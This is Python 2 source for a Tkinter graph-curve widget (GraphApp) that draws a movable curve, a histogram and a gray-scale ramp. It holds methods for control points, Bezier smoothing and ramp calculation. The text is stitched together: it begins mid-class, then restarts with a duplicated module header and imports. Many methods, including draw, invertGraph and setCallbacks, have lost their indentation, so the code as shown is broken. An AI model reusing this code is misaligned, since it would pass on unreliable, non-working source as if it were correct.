        for op in self.oldpoints:
            self.controlpoints.append(op)
        self.controlpoints.sort()
        if len(self.controlpoints)>0:
            # re-add the start/end markers unless a point occupies x=50/51
            # (left edge) or x=304/305 (right edge)
            if self.controlpoints[0][0]==50 or self.controlpoints[0][0]==51 :
                pass
            else:
                self.controlpoints.append(self.startpoint)
                self.controlpoints.sort()
            if self.controlpoints[-1][0]==305 or self.controlpoints[-1][0]==304:
                pass
            else:
                self.controlpoints.append(self.endpoint)
                self.controlpoints.sort()
        return self.controlpoints
    def setControlPoints(self,points):
        """Replace the curve with the given list of (x, y) control points.

        x must lie in [50, 305] and y in [20, 275] (canvas axis bounds).
        NOTE(review): the caller's list is sorted and extended in place,
        since self.controlpoints is bound to the same list object.
        """
        assert isinstance(points, types.ListType),"Illegal type for points"
        for (x,y) in points:
            assert x in range(50,306),"coordinates are out of range,x should be in [50,305]"
            assert y in range(20,276),"coordinates are out of range,y should be in [20,275]"
        self.oldpoints=[]
        self.controlpoints=[]
        self.reset()
        self.oldpoints=self.controlpoints=points
        self.controlpoints.sort()
        # make sure the fixed start/end markers are present
        if self.controlpoints[0]!=self.startpoint:
            self.controlpoints.append(self.startpoint)
        if self.controlpoints[-1]!=self.endpoint:
            self.controlpoints.append(self.endpoint)
        self.canvas.delete(self.curline)
        self.controlpoints.sort()
        if self.Smooth:
            self.curline=self.canvas.create_line( self.controlpoints,smooth=1)
        else:
            self.curline=self.canvas.create_line( self.controlpoints)
        for p in self.controlpoints[1:-1]:
            self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
            self.curovals.append(self.curoval)
        (self.curx,self.cury)= self.controlpoints[-2]
        self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
        if self.continuous or self.mousebuttonup:
            self.newd1ramp=self.caluculate_ramp()
            self.callbacks.CallCallbacks(self.newd1ramp)
    def setSensitivity(self,val):
        # Forward *val* to the sensitivity thumbwheel (same scale as the
        # GUI widget; the default elsewhere in this class is 0.013).
        self.d1scalewheel.set(val)
    def Update(self):
        """Callback of the "Update" button: in deferred-update mode
        (self.update == 1) recompute the ramp and fire the callbacks."""
        if self.update==1:
            dramp=self.caluculate_ramp()
            self.newd1ramp=dramp
            self.callbacks.CallCallbacks(dramp)
def dismiss_cb(self):
try:
if self.master.winfo_ismapped():
self.master.withdraw()
except:
if self.master.master.winfo_ismapped():
self.master.master.withdraw()
#draw Histogram
def removeHistogram(self):
"""removes Histograms"""
for b in self.bars:
self.canvas.delete(b)
self.bars=[]
    def drawHistogram(self):
        """Draw a histogram behind the curve from self.histvalues (one pixel
        count per source-image value), scaled so the tallest bar is 200 px,
        then raise the curve line and ovals above the bars."""
        self.removeHistogram()
        if self.histvar.get():
            h=self.histvalues
            if h==[]:
                return
            list_pixels_count=h
            c=[]
            maxc=max(list_pixels_count)
            if maxc==0:
                return
            # presumably drops a dominant (background) count so it does not
            # flatten the rest of the bars -- TODO confirm intent
            if list_pixels_count.index(maxc):
                list_pixels_count.remove(maxc)
                list_pixels_count.insert(255,0)
            for i in list_pixels_count[:256]:
                max_list=max(list_pixels_count)
                if max_list==0:
                    return
                # scale each count to a bar height of at most 200 pixels
                val=i*200/max_list
                c.append(val)
            # one vertical 1-px line per value, rising from the x axis (y=275)
            for i in range(0,len(c)):
                x1=50+i
                x2=50+i
                y1=275-c[i]
                y2=275
                r=self.canvas.create_line([(x1,y1),(x2,y2)],fill="gray70",width=1)
                self.bars.append(r)
            #displaying line and ovals ontop
            self.canvas.tkraise(self.curline)
            for i in self.curovals:
                self.canvas.tkraise(i)
            if hasattr(self,"curoval"):
                self.canvas.tkraise(self.curoval)
            self.canvas.update()
        ##Update Histograms on Graphtool
        #if self.update!=1:
        #    prev_option=self.optionType.get()
        #    self.optionType.set(2)
        #    self.update=1
        #    self.Update()
        #    self.optionType.set(prev_option)
        #    self.update=0
        #    return
################SMOOTHING CODE############################
def addcurve(self,out, xy, steps):
add = out.append
for i in range(1, steps+1):
t = float(i) / steps; t2 = t*t; t3 = t2*t
u = 1.0 - t; u2 = u*u; u3 = u2*u
add(xy[0]*u3 + 3*(xy[2]*t*u2 + xy[4]*t2*u) + xy[6]*t3)
add(xy[1]*u3 + 3*(xy[3]*t*u2 + xy[5]*t2*u) + xy[7]*t3)
    def smooth(self,xy, steps=12):
        """Return a smoothed polyline through the flat coordinate list *xy*
        ([x0, y0, x1, y1, ...]) by replacing each segment with a cubic
        Bezier, sampled with *steps* points via addcurve().

        A closed polyline (first point == last point) gets an extra curve
        joining the end segment back to the first one.  Degenerate segments
        (two coincident consecutive points) are passed through unsampled.
        """
        if not xy:
            return xy
        closed = xy[0] == xy[-2] and xy[1] == xy[-1]
        out = []
        if closed:
            # connect end segment to first segment
            control = (
                0.500*xy[-4] + 0.500*xy[0],
                0.500*xy[-3] + 0.500*xy[1],
                0.167*xy[-4] + 0.833*xy[0],
                0.167*xy[-3] + 0.833*xy[1],
                0.833*xy[0] + 0.167*xy[2],
                0.833*xy[1] + 0.167*xy[3],
                0.500*xy[0] + 0.500*xy[2],
                0.500*xy[1] + 0.500*xy[3],
                )
            out = [control[0], control[1]]
            self.addcurve(out, control, steps)
        else:
            out = [xy[0], xy[1]]
        # each window of three consecutive points contributes one Bezier;
        # inner control points sit at 1/6 and 5/6 blends of the segment ends
        for i in range(0, len(xy)-4, 2):
            if i == 0 and not closed:
                control = (xy[i],xy[i+1],0.333*xy[i] + 0.667*xy[i+2],0.333*xy[i+1] + 0.667*xy[i+3],)
            else:
                control = (
                    0.500*xy[i] + 0.500*xy[i+2],
                    0.500*xy[i+1] + 0.500*xy[i+3],
                    0.167*xy[i] + 0.833*xy[i+2],
                    0.167*xy[i+1] + 0.833*xy[i+3],
                    )
            if i == len(xy)-6 and not closed:
                control = control + (
                    0.667*xy[i+2] + 0.333*xy[i+4],
                    0.667*xy[i+3] + 0.333*xy[i+5],
                    xy[i+4],
                    xy[i+5],
                    )
            else:
                control = control + (
                    0.833*xy[i+2] + 0.167*xy[i+4],
                    0.833*xy[i+3] + 0.167*xy[i+5],
                    0.500*xy[i+2] + 0.500*xy[i+4],
                    0.500*xy[i+3] + 0.500*xy[i+5],
                    )
            if ((xy[i] == xy[i+2] and xy[i+1] == xy[i+3]) or
                (xy[i+2] == xy[i+4] and xy[i+3] == xy[i+5])):
                out.append(control[6])
                out.append(control[7])
            else:
                self.addcurve(out, control, steps)
        return out
# (garbled separator removed: a duplicated copy of this module follows)
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
##############################################################################
#
#
# Authors: <NAME>,<NAME>
#
#
###############################################################################
#
#
#
#
#$Id: graphtool.py,v 1.47 2007/12/04 21:28:04 vareille Exp $
#Graph Tool is a widget with movable graph curve
#app=GraphApp(root)
#app.caluculate_ramp() returns current ramp
#from ViewerFramework.VFCommand import Command, CommandGUI
from Tkinter import *
import Tkinter
import tkFileDialog
import types,os
from mglutil.util.callback import CallBackFunction
from mglutil.util.callback import CallbackManager
from mglutil.util.misc import ensureFontCase
import numpy.oldnumeric as Numeric
from mglutil.gui.BasicWidgets.Tk.thumbwheel import ThumbWheel
import Pmw
from Pmw import *
from mglutil.util.misc import deepCopySeq
class GraphApp:
# Initialization
    def __init__(self,master=None,callback=None,continuous=1):
        """Build the graph-tool widget inside *master*: menu bar (File/Edit/
        Update/Curve), sensitivity thumbwheel, Update/Dismiss buttons and the
        drawing canvas with axes, gray-scale ramps and the initial straight
        curve from startpoint (50,275) to endpoint (305,20).

        callback   -- callable (or list of callables) invoked with the ramp
        continuous -- 1 to fire callbacks on every drag motion
        """
        self.master=master
        self.callback = None
        self.callbacks = CallbackManager()
        self.canvas=canvas = Canvas(self.master,width=345,height=320,bg='white')
        self.toolbar = Frame(master) # Create Toolbar
        self.toolbar.pack(side='top', expand=1, fill='both')
        self.menuFrame1 = Tkinter.Frame(self.toolbar, relief='raised', borderwidth=3)
        self.menuFrame1.pack(side='top', expand=1, fill='x')
        self.filebutton = Tkinter.Menubutton(self.menuFrame1, text='File')
        self.filebutton.pack(side='left')
        self.filemenu = Tkinter.Menu(self.filebutton, {})
        self.filemenu.add_command(label='Read', command=self.read_cb)
        self.filemenu.add_command(label='Write', command=self.write_cb)
        self.filebutton['menu'] = self.filemenu
        self.editbutton = Tkinter.Menubutton(self.menuFrame1, text='Edit')
        self.editbutton.pack(side='left', anchor='w')
        self.editmenu = Tkinter.Menu(self.editbutton, {})
        self.editmenu.add_command(label='Reset to first in history', command=self.resetAll_cb)
        self.editmenu.add_command(label='Step back in history loop', command=self.stepBack_cb)
        self.editmenu.add_command(label='Default Curve', command=self.defaultcurve_cb)
        self.editmenu.add_command(label='Invert Curve',command=self.invertGraph)
        self.histvar=IntVar()
        self.histvar.set(1)
        self.editmenu.add_checkbutton(label='Histogram',var=self.histvar,command=self.drawHistogram)
        self.editbutton['menu'] = self.editmenu
        # update mode: 0=Continuous, 1=MouseButtonUp, 2=explicit Update
        self.optionType = IntVar()
        self.updatebutton = Tkinter.Menubutton(self.menuFrame1, text='Update')
        self.updatebutton.pack(side='left', anchor='w')
        self.updatemenu = Tkinter.Menu(self.updatebutton,{} )
        for v,s in {0:'Continuous',1:'MouseButtonUp',2:'Update'}.items():
            self.updatemenu.add_radiobutton(label=s,
                            var=self.optionType,
                            value = v,command=self.calloption)
        if continuous==1:
            self.optionType.set(0)
        self.updatebutton['menu'] = self.updatemenu
        #Curve Type
        self.CurveType = IntVar()
        self.CurveType.set(0)
        self.Smooth=1
        self.curvebutton = Tkinter.Menubutton(self.menuFrame1, text='Curve')
        self.curvebutton.pack(side='left', anchor='w')
        self.curvemenu = Tkinter.Menu(self.curvebutton,{} )
        for v,s in {0:'Smooth',1:'Freehand'}.items():
            self.curvemenu.add_radiobutton(label=s,
                            var=self.CurveType,
                            value = v,command=self.curveoption)
        self.curvebutton['menu'] = self.curvemenu
        f1 = Tkinter.Frame(self.master)
        f1.pack(side='bottom', fill='both', expand=1)
        self.d1scalewheellab=Label(f1,text="Sensitivity")
        self.d1scalewheellab.pack(side="left")
        self.d1scalewheel=ThumbWheel(width=100, height=26,wheelPad=4,master=f1,labcfg={'fg':'black', 'side':'left', 'text':'Test:'},wheelLabcfg1={'font':(ensureFontCase('times'),14,'bold')},wheelLabcfg2={'font':(ensureFontCase('times'),14,'bold')},canvascfg={'bg':'blue'},min = 0.0,max = 1.0,precision =4,showlabel =0,value =0.013,continuous =0,oneTurn =0.01,size = 200)
        self.d1scalewheel.pack(side="left")
        #tooltip
        self.balloon = Pmw.Balloon(f1)
        self.balloon.bind(self.d1scalewheel,"cutoff value for differences in Z xoordinates,small values generate more contours")
        self.Updatebutton=Button(f1,text=' Update ',command=self.Update)
        self.Updatebutton.pack(side=LEFT)
        self.Quitbutton=Button(f1,text=' Dismiss ',command=self.dismiss_cb)
        self.Quitbutton.pack(side=RIGHT)
        self.canvas.bind("<Button-1>", self.OnCanvasClicked)
        self.canvas.bind("<B1-Motion>", self.OnCanvasMouseDrag)
        self.canvas.bind("<ButtonRelease-1>", self.OnCanvasMouseUp)
        self.canvas.config(closeenough=2.0)
        self.canvas.pack(side=BOTTOM, fill=BOTH,expand=1)
        # fixed curve anchors: bottom-left (value 0) and top-right (value 255)
        self.startpoint=(px,py)=(50,275)
        self.endpoint=(px1,py1)=(305,20)
        self.newpoints=[(px,py),(px1,py1)]
        self.canvas.create_rectangle([(px-1,py),(px1+1,py1)],fill='white',outline="black",width=1)
        self.canvas.create_text(46,281,text=0,anchor=N)
        #Drawing Graph Sheet
        for i in range(1,6):
            x=50+i*50
            canvas.create_line(x,280,x,275,width=1)
            canvas.create_text(x,281,text='%d' %(50*i),anchor=N)
        for i in range(1,5):
            x=50+i*50
            canvas.create_line(x,275,x,20,width=1,fill="gray80")
        for i in range(1,6):
            y=275-i*50
            canvas.create_line(45,y,50,y,width=1)
            canvas.create_text(44,y,text='%d' %(50*i),anchor=E)
        for i in range(1,5):
            y=275-i*50
            canvas.create_line(50,y,305,y,width=1,fill="gray80")
        (x,y)=self.newpoints[0]
        (x1,y1)=self.newpoints[-1]
        self.curline=canvas.create_line(self.newpoints,fill='black',width=1)
        #GRAY SCALE
        grays=[]
        for i in range(0,100,1):
            grays.append("gray"+"%d" %i)
        #grays.reverse()
        #bottom one
        x1=48
        x2=51
        self.canvas.create_rectangle([(50,315),(307,300)],fill='white',outline="black",width=0.5)
        for a in grays:
            if x1>306:
                x1=x2=306
            self.canvas.create_rectangle([(x1+2.5,314),(x2+2.5,301)],fill=a,outline=a,width=1)
            x1=x1+2.5
            x2=x2+2.5
        #left one
        y1=274
        y2=271
        self.canvas.create_rectangle([(20,275),(5,20)],fill='black',outline="black",width=0.5)
        for a in grays:
            if y1>275:
                y1=y2=275
            self.canvas.create_rectangle([(19,y1-2.5),(6,y2-2.5)],fill=a,outline=a,width=1)
            y1=y1-2.5
            y2=y2-2.5
        self.oldpoints=[]
        self.canvas.configure(cursor='cross')
        self.curovals=[]
        self.default_points=[(50,275),(88, 238), (101, 150), (154, 78), (75, 271),(305,20)]
        # now set the constructor options correctly using the configure method
        apply( self.configure, (),{'callback':callback,'continuous':continuous})
        self.continuous=continuous
        self.mousebuttonup=0
        self.update=0
        self.range_points=[]
        self.history=[]
        self.bars=[]
        self.default_ramp=[]
        self.histvalues=[]
def calloption(self):
tag=self.optionType.get()
self.continuous=0
self.mousebuttonup=0
self.update=0
if tag==0:
self.continuous=1
elif tag==1:
self.mousebuttonup=1
elif tag==2:
self.update=1
    def curveoption(self):
        """Switch between smooth (tag 0, Bezier-smoothed) and freehand
        (tag 1, plain polyline) rendering and redraw the curve."""
        tag=self.CurveType.get()
        self.Smooth=0
        self.Freehand=0
        if tag==0:
            self.Smooth=1
            self.canvas.delete(self.curline)
            self.curline=self.canvas.create_line(self.getControlPoints(),smooth=1)
        elif tag==1:
            self.Freehand=1
            self.canvas.delete(self.curline)
            self.curline=self.canvas.create_line(self.getControlPoints())
    def OnCanvasClicked(self,event):
        """Appends last drag point to controlpoint list if not appended by mouseleave func.
        when clicked on any controlpoint removes control point and draws line with remaining
        control points."""
        self.CLICK_NODRAG=1
        # keep the sensitivity stored with the last history entry in sync
        if self.history!=[]:
            if self.history[-1][1]!=self.d1scalewheel.get():
                self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
        # commit the point from the previous drag, if any
        if hasattr(self,"curx"):
            if (self.curx,self.cury) :#not in [self.startpoint,self.endpoint]:
                (self.ox,self.oy)=(self.curx,self.cury)
                if (self.ox,self.oy) not in self.oldpoints:
                    self.oldpoints.append((self.ox,self.oy))
                if hasattr(self,"curoval"):
                    self.curovals.append(self.curoval)
        self.OrgX=event.x
        self.OrgY=event.y
        CtlPoints=[]
        xcoords=[]
        ycoords=[]
        #Limiting points not to cross
        self.limit_xcoord=[]
        # build a 19x19 pixel neighbourhood around the click position
        for i in range(0,10):
            xcoords.append(self.OrgX-i)
            ycoords.append(self.OrgY-i)
            xcoords.append(self.OrgX+i)
            ycoords.append(self.OrgY+i)
        if xcoords!=[] and ycoords!=[]:
            for x in xcoords:
                for y in ycoords:
                    CtlPoints.append((x,y))
        self.range_points=self.oldpoints
        self.range_points.sort()
        # if the click hits an existing control point, remember its two
        # neighbours so draw() can stop the drag from crossing them
        for c in CtlPoints:
            if c in self.range_points:
                index_c=self.range_points.index(c)
                if index_c<len(self.range_points)-1:
                    self.limit_xcoord.append(self.range_points[index_c+1])
                    if index_c>0:
                        self.limit_xcoord.append(self.range_points[index_c-1])
                        return
                    else:
                        self.limit_xcoord.append(self.startpoint)
                        return
                elif index_c==len(self.range_points)-1:
                    self.limit_xcoord.append(self.range_points[index_c-1])
                    self.limit_xcoord.append(self.endpoint)
                    return
        self.newd1ramp= self.caluculate_ramp()
    def OnCanvasMouseUp(self,event):
        """Button-release handler: commit the dragged point; on a plain
        click (no drag) delete the control point under the cursor and
        redraw; fire callbacks in mousebuttonup mode; record history."""
        CtlPoints=[]
        xcoords=[]
        ycoords=[]
        if hasattr(self,"curx"):
            (self.ox,self.oy)=(self.curx,self.cury)
            if (self.ox,self.oy) not in self.oldpoints :#not in [self.startpoint,self.endpoint] :
                self.oldpoints.append((self.ox,self.oy))
            if hasattr(self,"curoval"):
                if self.curoval not in self.curovals:
                    self.curovals.append(self.curoval)
        if self.CLICK_NODRAG==1:
            #finding out points around the selected point
            for i in range(0,10):
                xcoords.append(self.OrgX-i)
                ycoords.append(self.OrgY-i)
                xcoords.append(self.OrgX+i)
                ycoords.append(self.OrgY+i)
            if xcoords!=[] and ycoords!=[]:
                for x in xcoords:
                    for y in ycoords:
                        CtlPoints.append((x,y))
            # a click on an existing point removes it (and its oval)
            for c in CtlPoints:
                if c in self.oldpoints:
                    ind=self.oldpoints.index(c)
                    op=self.oldpoints[ind]
                    if ind>0:
                        prev_oldpoint=self.oldpoints[ind-1]
                    else:
                        prev_oldpoint=self.endpoint
                    del self.oldpoints[ind]
                    for co in self.curovals:
                        ov_point1=self.canvas.coords(co)
                        if len(ov_point1)!=0:
                            # oval coords are the bounding box; +2 recovers the centre
                            ov_point=(int(ov_point1[0]+2),int(ov_point1[1]+2))
                            if ov_point==c and ov_point not in [self.startpoint,self.endpoint]:
                                self.canvas.delete(co)
                                self.curovals.remove(co)
                                if hasattr(self,"curx"):
                                    if ov_point==(self.curx,self.cury):
                                        (self.curx,self.cury)=prev_oldpoint
                    self.draw()
        if self.mousebuttonup:
            self.newd1ramp=self.caluculate_ramp()
            self.callbacks.CallCallbacks(self.newd1ramp)
        self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
    def OnCanvasMouseDrag(self,event):
        """Mouse-motion handler while button 1 is held: if the drag started
        on an existing control point, remove that point and its oval, then
        track the cursor as the current point and redraw."""
        self.CLICK_NODRAG=0
        CtlPoints=[]
        xcoords=[]
        ycoords=[]
        #making active clickrange to be ten points around clicked point
        for i in range(0,10):
            xcoords.append(self.OrgX-i)
            ycoords.append(self.OrgY-i)
            xcoords.append(self.OrgX+i)
            ycoords.append(self.OrgY+i)
        if xcoords!=[] and ycoords!=[]:
            for x in xcoords:
                for y in ycoords:
                    CtlPoints.append((x,y))
        for c in CtlPoints:
            if c in self.oldpoints:
                ind=self.oldpoints.index(c)
                op=self.oldpoints[ind]
                del self.oldpoints[ind]
                for co in self.curovals:
                    ov_point1=self.canvas.coords(co)
                    if len(ov_point1)!=0:
                        # oval coords are the bounding box; +2 recovers the centre
                        ov_point=(int(round(ov_point1[0],3))+2,int(round(ov_point1[1],3))+2)
                        if ov_point==c :
                            self.canvas.delete(co)
                            self.curovals.remove(co)
        self.curx=dx=event.x
        self.cury=dy=event.y
        self.draw()
def draw(self):
"""Draws line,ovals with current controlpoints. """
new1points=[]
curve_points=[]
self.smoothened_points=[]
if self.CLICK_NODRAG==0:
dx=self.curx
dy=self.cury
else:
(dx,dy)=(self.curx,self.cury)=(self.endpoint)
###Limiting xcoords of the current point not to cross adjacent points
if hasattr(self,"limit_xcoord"):
if self.limit_xcoord!=[]:
self.limit_xcoord.sort()
if (self.curx,self.cury) not in [self.startpoint,self.endpoint]:
if (self.curx,self.cury)< self.limit_xcoord[0]:
if self.curx<=self.limit_xcoord[0][0] and self.cury<self.limit_xcoord[0][1]:
dx=self.curx=self.limit_xcoord[0][0]+1
if self.curx<=self.limit_xcoord[0][0] and self.cury>self.limit_xcoord[0][1]:
dx=self.curx=self.limit_xcoord[0][0]
if (self.curx,self.cury)> self.limit_xcoord[1]:
if self.curx>=self.limit_xcoord[1][0] and self.cury>self.limit_xcoord[1][1]:
dx=self.curx=self.limit_xcoord[1][0]-1
if self.curx>=self.limit_xcoord[1][0] and self.cury<self.limit_xcoord[1][1]:
dx=self.curx=self.limit_xcoord[1][0]
#Limit graph with in the axis
if self.curx not in range(50,305):
if self.curx<50:
self.curx=dx=50
else:
self.curx=dx=305
if self.cury not in range(20,275):
if self.cury<20:
self.cury=dy=20
else:
self.cury=dy=275
#adding start,end points
new1points.append(self.startpoint)
new1points.append(self.endpoint)
#adding current point to list
if (dx,dy) not in new1points and (dx,dy) not in [self.startpoint,self.endpoint]:
new1points.append((dx,dy))
#adding oldpoints to list
if hasattr(self,"ox"):
for op in self.oldpoints:
if op not in new1points:
new1points.append(op)
new1points.sort()
#removing oval point that is on drag
if hasattr(self,"curoval"):
if self.curoval not in self.curovals:
self.canvas.delete(self.curoval)
self.canvas.delete(self.curline)
#if points that start with 50 or 51 or 305,304 other than start ,end
#points exists remove start or end points
#remove ovals
#finding oval for start point and endpoint
for i in new1points:
if i[0]==51 or i[0]==50:
if i!=self.startpoint:
if self.startpoint in new1points:
new1points.remove(self.startpoint)
###removing start point oval
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
for i in new1points:
if i[0]==304 or i[0]==305:
if i!=self.endpoint :
if self.endpoint in new1points:
new1points.remove(self.endpoint)
###removing end point oval
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
new1points.sort()
for (x,y) in new1points:
curve_points.append(x)
curve_points.append(y)
self.smoothened_points= self.smooth(curve_points)
#drawing line
if len(self.smoothened_points)>2:
if self.Smooth:
self.curline=self.canvas.create_line(self.smoothened_points)
else:
self.curline=self.canvas.create_line(curve_points)
else:
if curve_points[0]==50 or 51:
if self.Smooth:
self.curline=self.canvas.create_line(curve_points,smooth=1)
else:
self.curline=self.canvas.create_line(curve_points)
else:
self.curline=self.canvas.create_line(self.startpoint,self.endpoint)
##Adding oval when start or end point in new1points
coval_coords=[]
for i in self.curovals:
coval_coords.append(self.canvas.coords(i))
if self.endpoint in new1points:
co=self.canvas.create_oval(self.endpoint[0]-2,self.endpoint[-1]-2,self.endpoint[0]+2,self.endpoint[-1]+2,width=1,outline='black',fill='black')
endco_coords =self.canvas.coords(co)
if endco_coords not in coval_coords:
self.curovals.append(co)
if self.startpoint in new1points:
co=self.canvas.create_oval(self.startpoint[0]-2,self.startpoint[-1]-2,self.startpoint[0]+2,self.startpoint[-1]+2,width=1,outline='black',fill='black')
startco_coords=self.canvas.coords(co)
if startco_coords not in coval_coords:
self.curovals.append(co)
#drawing ovals
if (self.curx,self.cury)!=self.endpoint:
self.curoval=self.canvas.create_oval(self.curx-2,self.cury-2,self.curx+2,self.cury+2,width=1,outline='black',fill='black')
if (self.curx,self.cury)==self.endpoint and self.endpoint in new1points:
self.curoval=self.canvas.create_oval(self.curx-2,self.cury-2,self.curx+2,self.cury+2,width=1,outline='black',fill='black')
self.newd1ramp= self.caluculate_ramp()
if self.continuous:
self.callbacks.CallCallbacks(self.newd1ramp)
######## convert coordinates to ramp##################
    def caluculate_ramp(self):
        """Rasterize the current control-point polyline into a float ramp.

        Walks each consecutive pair of control points, linearly
        interpolating one sample per x pixel, then maps canvas y to a value
        via 275 - y (clamped to 255.0).  Returns a Numeric float array; if
        no samples were produced, returns the identity ramp arange(0, 256).
        """
        dramp=[]
        mypoints=[]
        mynewpoints=[]
        self.oldpoints.sort()
        calcpoints=[]
        #if self.continuous :
        # include the point currently being dragged, then all committed
        # points, then the fixed start/end anchors
        if hasattr(self,"curx"):
            if (self.curx,self.cury) not in self.oldpoints and (self.curx,self.cury) not in [self.startpoint,self.endpoint]:
                calcpoints.append((self.curx,self.cury))
        if len(self.oldpoints)!=0:
            for o in self.oldpoints:
                if o not in calcpoints:
                    calcpoints.append(o)
        if self.startpoint not in calcpoints:
            calcpoints.append(self.startpoint)
        if self.endpoint not in calcpoints:
            calcpoints.append(self.endpoint)
        calcpoints.sort()
        length=len(calcpoints)
        for l in range(length):
            if l+1<=length-1:
                mypoints=[calcpoints[l],calcpoints[l+1]]
                if calcpoints[l] not in mynewpoints:
                    mynewpoints.append( calcpoints[l])
                (x1,y1)=calcpoints[l]
                (x2,y2)=calcpoints[l+1]
                # step one pixel in x, accumulating dy/dx in y
                if x1>x2:
                    dcx=x1-x2
                    px=x1-1
                else:
                    dcx=x2-x1
                    px=x1+1
                if y1>y2:
                    dcy=y1-y2
                    if dcx>=1:
                        py=y1-float(dcy)/float(dcx)
                    else:
                        py=y1
                else:
                    dcy=y2-y1
                    if dcx>=1:
                        py=y1+float(dcy)/float(dcx)
                    else:
                        py=y2
                mynewpoints.append( (px,int(round(py))))
                for dc in range(dcx-1):
                    if x1>x2:
                        px=px-1
                    else:
                        px=px+1
                    if y1>y2:
                        if dcx>=1:
                            py=py-float(dcy)/float(dcx)
                        else:
                            py=y1
                    else:
                        if dcx>=1:
                            py=py+float(dcy)/float(dcx)
                        else:
                            py=y2
                    mynewpoints.append( (px,int(round(py))))
        ramp=[]
        for r in mynewpoints:
            #scale
            # canvas y axis grows downward: y=275 -> 0.0, y=20 -> 255.0
            ra=float(275-r[1])
            if ra>=256:
                ra=255.0
            ramp.append(ra)
        dramp=Numeric.array(ramp,'f')
        if len(dramp)!=0:
            return dramp
        else:
            dramp=Numeric.arange(0,256,1,'f')
            return dramp
def get(self):
if hasattr(self,"newd1ramp"):
return self.newd1ramp
else:
return self.caluculate_ramp()
    def configure(self, **kw):
        """Apply constructor-style keyword options.

        'type' is popped first and forwarded to self.setType; 'callback'
        is forwarded to setCallbacks.  Other keywords are ignored.
        NOTE(review): setType is not defined in the visible part of this
        file -- passing type=... may raise AttributeError; confirm against
        the full class.
        """
        if 'type' in kw.keys(): # make sure type is set first
            self.setType(kw['type'])
            del kw['type']
        for key,value in kw.items():
            if key=='callback':
                self.setCallbacks(value)
def setCallbacks(self, cb):
"""Set widget callback. Must be callable function. Callback is called
every time the widget value is set/modified"""
assert cb is None or callable(cb) or type(cb) is types.ListType,\
"Illegal callback: must be either None or callable. Got %s"%cb
if cb is None: return
elif type(cb) is types.ListType:
for func in cb:
assert callable(func), "Illegal callback must be callable. Got %s"%func
self.callbacks.AddCallback(func)
else:
self.callbacks.AddCallback(cb)
self.callback = cb
def invertGraph(self):
"""This function is for inverting graph by reverse computing controlpoints"""
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
invert_points=[]
#self.oldpoints=[]
points=self.getControlPoints()
if len(points)<2:
points=[self.startpoint,self.endpoint]
for p in points:
if p[1] in range(20,276):
y=275 -(p[1]-20)
invert_points.append((p[0],y))
self.reset()
###################################################
#Some times start and end points are not deleted
#So for deleting them canvas.find_enclosed points at
#startpoint and endpoint are caluculated(returns alist of
#canvas objects present there) and if the coords of
#any canvas objects matches with start or end point that gets deleted
#####################################################
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
self.canvas.delete(self.curline)
if self.Smooth:
self.curline=self.canvas.create_line(invert_points,smooth=1)
else:
self.curline=self.canvas.create_line(invert_points)
self.oldpoints=invert_points
for p in invert_points:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =invert_points[-2]
if self.continuous or self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks([self.newd1ramp])
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
    def defaultcurve_cb(self):
        """Replace the current curve with the built-in default control points
        and redraw the line and its control-point ovals.

        Side effects: resets the sensitivity thumbwheel to 0.013, appends the
        new state to self.history and caches the resulting ramp in
        self.default_ramp.
        """
        # keep the sensitivity stored with the last history entry in sync
        if self.history!=[]:
            if self.history[-1][1]!=self.d1scalewheel.get():
                self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
        points=[]
        self.default_points=[]
        self.oldpoints=[]
        self.d1scalewheel.set(0.013)
        self.default_points=[(50,275),(88, 238), (101, 150), (154, 78), (75, 271),(305,20)]
        self.reset()
        self.canvas.delete(self.curline)
        self.default_points.sort()
        if self.Smooth:
            self.curline=self.canvas.create_line(self.default_points,smooth=1)
        else:
            self.curline=self.canvas.create_line(self.default_points)
        self.oldpoints=self.default_points
        # one small grabbable oval per control point
        for p in self.default_points:
            self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
            self.curovals.append(self.curoval)
        (self.curx,self.cury) =self.default_points[-2]
        if self.continuous or self.mousebuttonup:
            self.newd1ramp=self.caluculate_ramp()
            self.callbacks.CallCallbacks(self.newd1ramp)
        self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
